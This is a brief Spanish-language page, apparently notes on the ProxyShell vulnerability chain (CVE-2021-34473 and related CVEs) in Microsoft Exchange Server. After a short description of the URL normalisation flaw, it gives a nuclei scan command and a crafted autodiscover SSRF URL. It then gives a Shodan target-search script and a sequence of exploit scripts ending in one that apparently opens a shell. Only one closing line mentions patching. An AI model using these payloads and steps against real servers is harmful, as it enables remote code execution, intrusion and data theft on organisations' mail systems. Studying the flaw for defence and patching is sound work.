
CVE-2021-34473 Vulnerabilidad de ejecución remota de código en Microsoft Exchange Server
Vulnerabilidad de ejecución remota de código en Microsoft Exchange Server CVE-2021-34473. Esta normalización defectuosa de URL nos permite acceder a una URL de backend arbitraria mientras se ejecuta como la cuenta de máquina del servidor Exchange. Aunque este error no es tan potente como el SSRF en ProxyLogon, y solo podemos manipular la parte de la ruta de la URL, sigue siendo lo suficientemente potente para llevar a cabo ataques adicionales con acceso arbitrario al backend.
Escáner nuclei para Proxyshell RCE (CVE-2021-34423, CVE-2021-34473, CVE-2021-31207) descubierto por orange tsai en Pwn2Own, que afecta a Microsoft Exchange Server.
nuclei -u target.com -t proxyshell.yaml
https://xxx.xxx.xxx.xxx/autodiscover/[email protected]/mapi/nspi/?&Email=autodiscover/autodiscover.json%[email protected]
sudo python3 shodan-query.py
sudo python3 ProxyShell.py -u https://<IP>
python2 /manual/check.py
sudo python3 /manual/proxyshell.py
python2 /manual/shell.py
Aplica las actualizaciones de seguridad que se encuentran aquí: CVE-2021-34473